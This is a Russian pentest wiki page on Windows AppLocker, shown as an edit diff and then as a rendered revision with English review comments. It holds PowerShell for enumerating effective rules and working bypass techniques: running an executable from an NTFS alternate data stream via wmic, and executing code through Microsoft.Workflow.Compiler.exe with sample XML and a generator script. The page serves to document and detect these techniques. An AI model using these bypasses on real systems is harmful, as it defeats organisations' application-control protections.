Applocker — различия между версиями
Drakylar (обсуждение | вклад) (Новая страница: «Applocker - функция управления приложениями и политиками по запуску программного обеспечени…») |
Drakylar (обсуждение | вклад) м |
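--- a/Applocker
+++ b/Applocker
@@ -38,1 +38,196 @@
 ** APPX
+
+= Общее =
+
+== Получение политики (все юзеры) ==
+
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
+Get-ApplockerPolicy -effective
+</syntaxhighlight>
+
+== Получение политики (все группы текущего пользователя) ==
+
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
+$a = Get-ApplockerPolicy -effective
+
+$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
+$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
+
+Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
+$f = 0;
+$v = $y.UserOrGroupSid.value;
+Foreach ($z in $g){
+if (($z.Value -eq $u) -or ($z.Value -eq $v)){
+$f= 1;
+};
+};
+if ($f -eq 1){
+Write-Output $y.PathConditions;
+Write-Output $y.Action;
+}
+}}
+</syntaxhighlight>
+
+Однострочник
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
+$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
+</syntaxhighlight>
+
+= Обход AppLocker =
+
+== Альтернативный канал ==
+
+Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
+
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
+type test.exe > C:\logs:test.exe
+wmic process call create '"C:\logs:test.exe"'
+</syntaxhighlight>
+
+== Интерпретаторы ==
+
+* python
+
+* perl
+
+* java
+
+И так далее
+
+== Макросы ворда ==
+
+Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
+
+== Небезопасные политики ==
+
+Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
+
+
+== InstallUtil ==
+
+См. [amsi]
+
+== Microsoft.Workflow.Compiler.exe ==
+
+
+test.xml:
+<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll; height: 300px" >
+<?xml version="1.0" encoding="utf-8"?>
+<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
+<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
+<d2p1:string>test.xoml</d2p1:string>
+</files>
+<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
+<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
+<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
+<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
+<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
+<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
+<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
+<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
+<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
+<d2p1:checkTypes>false</d2p1:checkTypes>
+<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
+<d2p1:compilerOptions i:nil="true" />
+<d2p1:generateCCU>false</d2p1:generateCCU>
+<d2p1:languageToUse>CSharp</d2p1:languageToUse>
+<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
+<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
+<d2p1:mtInfo i:nil="true" />
+<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
+</parameters>
+</CompilerInput>
+</syntaxhighlight>
+
+
+text.xoml:
+<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
+<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
+<CodeActivity x:Name="codeActivity1" />
+<x:Code><![CDATA[
+public class Foo : SequentialWorkflowActivity {
+public Foo() {
+Console.WriteLine("FOOO!!!!");
+}
+}
+]]></x:Code>
+</SequentialWorkflowActivity>
+</syntaxhighlight>
+
+
+Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
+C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
+</syntaxhighlight>
+
+Полный фрагмент кода для автоматизации запуска:
+<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll;height:300px;" >
+function New-CompilerInputXml {
+<#
+.SYNOPSIS
+Creates a an XML file consisting of a serialized CompilerInput object.
+.DESCRIPTION
+New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
+.PARAMETER XOMLPath
+Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
+.PARAMETER OutputPath
+Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
+.EXAMPLE
+New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
+Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
+.EXAMPLE
+New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
+Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
+.OUTPUTS
+System.IO.FileInfo
+Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
+#>
+
+[OutputType([System.IO.FileInfo])]
+param (
+[String]
+[ValidateNotNullOrEmpty()]
+$XOMLPath = 'test.xoml',
+
+[Parameter(Mandatory = $True)]
+[String]
+[ValidateNotNullOrEmpty()]
+$OutputPath
+)
+
+# This assembly won't be loaded by default. We need to load
+# it in order to get access to the WorkflowCompilerParameters class.
+Add-Type -AssemblyName 'System.Workflow.ComponentModel'
+
+# This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
+$WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
+
+# Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
+$WFCompilerParams.GenerateInMemory = $True
+
+# Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
+$WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
+
+# Load the assembly
+$WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
+
+# This is the helper method that will serialize the CompilerInput object to disk
+$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
+
+$TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
+
+Move-Item $TempFile $OutputPath -PassThru
+}
+</syntaxhighlight>
+
+Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
+
+
+= Ссылки =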
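Review bot: The per-user policy snippet (the `Foreach ($z in $g)` loop, and the same condition in the `Однострочник` one-liner) never matches a rule whose `UserOrGroupSid` is the current user's own SID, because `$z.Value -eq $u` compares each *group* SID against the user SID and the user SID is not an element of `Groups`; the test should read `if (($v -eq $u) -or ($z.Value -eq $v)){`. Only `PathConditions` is printed, so publisher- and hash-based rules surface with an empty condition, and nothing prints the collection's `EnforcementMode`, so a rule listed here may belong to a collection in `AuditOnly` mode rather than an enforced one — `Write-Output $x.EnforcementMode;` before the inner loop would make that visible. In `New-CompilerInputXml`, `$XOMLPath` is declared and documented under `.PARAMETER XOMLPath` but never read: the files array is built from `$OutputPath` (`[String[]] @(,$OutputPath)`), which disagrees with the help text and looks like a transcription slip. The comment-based help also has two typos, `Creates a an XML file` and `XML wil was created`.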
Версия 14:50, 16 марта 2022
Applocker - функция управления приложениями и политиками по запуску программного обеспечения в Windows.
Позволяет управлять:
- Исполняемые файлы
- EXE
- COM
- Скрипты
- JS
- PS1
- VBS
- CMD
- BAT
- Установочные файлы
- MST
- MSI
- MSP
- Библиотеки
- DLL
- OCX
- Упакованные приложения
- APPX
Общее
Получение политики (все юзеры)
# Effective AppLocker policy as applied on this host; the section heading contrasts this with
# the per-user view in the next snippet, which filters rules by the caller's SID and groups.
# NOTE(review): each rule collection carries an EnforcementMode (Enabled / AuditOnly / NotConfigured);
# a rule listed here is only enforced when its collection is Enabled — check that before relying on it.
Get-ApplockerPolicy -effective
Получение политики (все группы текущего пользователя)
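# Lists the effective AppLocker rules that apply to the current user: a rule applies when its
# UserOrGroupSid is either the user's own SID or the SID of one of the user's groups.
# Fix relative to the earlier version: the user SID was compared against each *group* SID
# ($z.Value -eq $u), which never matches, so rules aimed directly at the user were silently dropped.
$a = Get-ApplockerPolicy -effective

$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)

Foreach ($x in @($a.rulecollections)){
    # Which file class the collection covers, and whether it is enforced (Enabled) or only logged (AuditOnly).
    Write-Output ("[{0}] EnforcementMode={1}" -f $x.RuleCollectionType, $x.EnforcementMode);
    Foreach($y in @($x)){
        $f = 0;
        $v = $y.UserOrGroupSid.value;
        # Rule aimed at the user's own SID.
        if ($v -eq $u){ $f = 1; };
        # Rule aimed at one of the user's groups.
        Foreach ($z in $g){
            if ($z.Value -eq $v){
                $f = 1;
            };
        };
        if ($f -eq 1){
            # Path rules carry PathConditions; publisher and hash rules carry PublisherConditions /
            # HashConditions instead, so print all three (absent properties simply show empty).
            $y | Select-Object Name, Action, PathConditions, PublisherConditions, HashConditions;
        }
    }
}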
Однострочник
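# One-line form of the snippet above. Same fix: the user SID is compared with the rule SID directly ($v -eq $u) instead of with every group SID, which could never match.
$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; if ($v -eq $u){$f = 1;}; Foreach ($z in $g){if ($z.Value -eq $v){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};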
Обход AppLocker
Альтернативный канал
Например, если политика разрешает запуск из C:\logs, то следующей командой мы можем сохранить файл в альтернативный поток (ADS) и запустить его:
REM Copies the binary into an NTFS alternate data stream attached to the allowed directory
REM (C:\logs in the example above) and starts it through WMI process creation.
REM Defender notes: streams on a directory entry can be listed with "dir /R"; a path rule that
REM allows a whole directory also covers streams on it, which is what this relies on.
type test.exe > C:\logs:test.exe
wmic process call create '"C:\logs:test.exe"'
Интерпретаторы
- python
- perl
- java
И так далее
Макросы ворда
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
Небезопасные политики
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
InstallUtil
См. [amsi]
Microsoft.Workflow.Compiler.exe
test.xml:
1 <?xml version="1.0" encoding="utf-8"?>
2 <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
3 <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
4 <d2p1:string>test.xoml</d2p1:string>
5 </files>
6 <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
7 <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
8 <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
9 <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
10 <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
11 <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
12 <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
13 <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
14 <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
15 <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
16 <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
17 <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
18 <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
19 <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
20 <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
21 <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
22 <d2p1:checkTypes>false</d2p1:checkTypes>
23 <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
24 <d2p1:compilerOptions i:nil="true" />
25 <d2p1:generateCCU>false</d2p1:generateCCU>
26 <d2p1:languageToUse>CSharp</d2p1:languageToUse>
27 <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
28 <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
29 <d2p1:mtInfo i:nil="true" />
30 <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
31 </parameters>
32 </CompilerInput>
text.xoml:
1 <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
2 <CodeActivity x:Name="codeActivity1" />
3 <x:Code><![CDATA[
4 public class Foo : SequentialWorkflowActivity {
5 public Foo() {
6 Console.WriteLine("FOOO!!!!");
7 }
8 }
9 ]]></x:Code>
10 </SequentialWorkflowActivity>
Microsoft.Workflow.Compiler.exe соберёт XML-проект и запустит его:
# Builds test.xml (which references test.xoml) with the signed, Microsoft-shipped workflow compiler
# and runs the code it contains; results.xml is the second, output argument.
# NOTE(review): this binary is rarely started interactively on workstations — confirm for the
# environment, then consider alerting on its process creation with an .xml argument from a
# user-writable location. Background in the SpecterOps post linked below.
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
Полный фрагмент кода для автоматизации создания входного XML-файла:
function New-CompilerInputXml {
<#
.SYNOPSIS
Creates an XML file consisting of a serialized CompilerInput object.
.DESCRIPTION
New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
.PARAMETER XOMLPath
Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
.PARAMETER OutputPath
Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
.EXAMPLE
New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
.EXAMPLE
New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
.OUTPUTS
System.IO.FileInfo
Outputs a FileInfo object to serve as confirmation that the resulting serialized XML file was created.
.NOTES
NOTE(review): as transcribed on this page, $XOMLPath is never read; the file list handed to
SerializeInputToWrapper is built from $OutputPath, which disagrees with .PARAMETER XOMLPath above.
The function depends on a non-public static method of Microsoft.Workflow.Compiler.exe, so it is
tied to whatever build of that binary sits in the runtime directory and may stop working if the
private method changes.
#>

    [OutputType([System.IO.FileInfo])]
    param (
        [String]
        [ValidateNotNullOrEmpty()]
        $XOMLPath = 'test.xoml',

        [Parameter(Mandatory = $True)]
        [String]
        [ValidateNotNullOrEmpty()]
        $OutputPath
    )

    # This assembly won't be loaded by default. We need to load
    # it in order to get access to the WorkflowCompilerParameters class.
    Add-Type -AssemblyName 'System.Workflow.ComponentModel'

    # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
    $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters

    # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
    $WFCompilerParams.GenerateInMemory = $True

    # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
    $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'

    # Load the assembly. The variable is not read afterwards: LoadFrom is called for its side effect,
    # which is what makes the [Microsoft.Workflow.Compiler.CompilerWrapper] type literal below resolvable.
    $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)

    # This is the helper method that will serialize the CompilerInput object to disk
    $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')

    # Static method, hence $null for the instance. The String[] argument presumably becomes the
    # <files> list seen in test.xml above — NOTE(review): it is fed $OutputPath here, not $XOMLPath.
    $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))

    # The helper wrote to a temp file; move it to the requested path. -PassThru yields the FileInfo
    # promised by .OUTPUTS. Without -Force, Move-Item refuses to overwrite an existing OutputPath.
    Move-Item $TempFile $OutputPath -PassThru
}
Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb